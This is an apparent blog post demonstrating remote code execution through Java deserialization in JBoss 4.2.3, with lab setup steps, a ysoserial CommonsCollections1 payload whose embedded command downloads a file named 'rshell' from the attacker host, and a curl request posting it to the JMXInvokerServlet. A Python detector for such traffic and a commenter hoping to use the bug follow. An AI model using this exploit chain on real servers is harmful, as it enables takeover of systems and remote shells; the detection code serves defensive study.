# Unserialize RCE vulnerability in Java


Server - 192.168.1.1

```
# wget -O jboss-4.2.3.zip http://sourceforge.net/projects/jboss/files/JBoss/JBoss-4.2.3.GA/jboss-4.2.3.GA-jdk6.zip/download
# unzip jboss-4.2.3.zip
# mv jboss-4.2.3.GA /usr/local/share/jboss
# adduser appserver
# chown -R appserver /usr/local/share/jboss
# su -l appserver
$ cd /usr/local/share/jboss/bin
$ ./run.sh -b 0.0.0.0
```

Client - 192.168.1.2

```
# wget https://github.com/frohoff/ysoserial/releases/download/v0.0.2/ysoserial-0.0.2-all.jar
# java -jar ysoserial-0.0.2-all.jar CommonsCollections1 'wget -O /tmp/rshell http://192.168.1.2/rshell' > /tmp/payload
# curl --header 'Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue' --data-binary '@/tmp/payload' http://192.168.1.1:8080/invoker/JMXInvokerServlet
```
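For the defending side, the request above leaves three observable traits: the serialized-object Content-Type, the Java serialization stream magic in the body, and Commons Collections class names inside the stream. The following is an added example, not part of the original post; the function names, marker list and sample requests are constructed for illustration.

```python
# Added example: constants and sample requests below are constructed for illustration.
JAVA_SER_MAGIC = b"\xac\xed\x00\x05"  # STREAM_MAGIC (0xACED) + STREAM_VERSION (5)
SER_CONTENT_TYPE = "application/x-java-serialized-object"
# Commons Collections classes used by known gadget chains (not exhaustive).
GADGET_MARKERS = (
    b"org.apache.commons.collections.functors.InvokerTransformer",
    b"org.apache.commons.collections.functors.ChainedTransformer",
)

def inspect_request(method, path, headers, body):
    """Return the reasons a request looks like Java deserialization traffic."""
    findings = []
    ctype = next((v for k, v in headers.items() if k.lower() == "content-type"), "")
    if SER_CONTENT_TYPE in ctype.lower():
        findings.append("serialized-object content type")
    # A stream can sit behind a prefix, so search instead of startswith().
    offset = body.find(JAVA_SER_MAGIC)
    if offset != -1:
        findings.append(f"java serialization magic at offset {offset}")
        hits = [m.decode() for m in GADGET_MARKERS if m in body]
        if hits:
            findings.append("gadget class in stream: " + ", ".join(hits))
    if findings and method == "POST" and path.startswith("/invoker/"):
        findings.append("posted to JBoss invoker servlet")
    return findings

def class_desc(name):
    """Constructed, non-functional fragment: TC_OBJECT, TC_CLASSDESC, length, name."""
    raw = name.encode()
    return b"sr" + len(raw).to_bytes(2, "big") + raw

SAMPLES = [  # constructed requests, not captured traffic
    ("POST", "/invoker/JMXInvokerServlet",
     {"Content-Type": SER_CONTENT_TYPE + "; class=org.jboss.invocation.MarshalledValue"},
     JAVA_SER_MAGIC + class_desc(GADGET_MARKERS[0].decode())),
    ("POST", "/invoker/JMXInvokerServlet",
     {"Content-Type": SER_CONTENT_TYPE},
     JAVA_SER_MAGIC + class_desc("org.jboss.invocation.MarshalledValue")),
    ("POST", "/login",
     {"Content-Type": "application/x-www-form-urlencoded"}, b"user=a&pass=b"),
]

if __name__ == "__main__":
    for method, path, headers, body in SAMPLES:
        print(method, path, inspect_request(method, path, headers, body) or "clean")
```

The second sample shows that the content type and magic alone also match ordinary invoker traffic, so the gadget-class finding is the stronger signal; it is not a complete list of gadget classes.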

References

http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/

1 comment:

Anonymous said...

I'm going to see if I can get something...
But everything suggests that thanks to this "bug" I'm going to succeed! XD

K.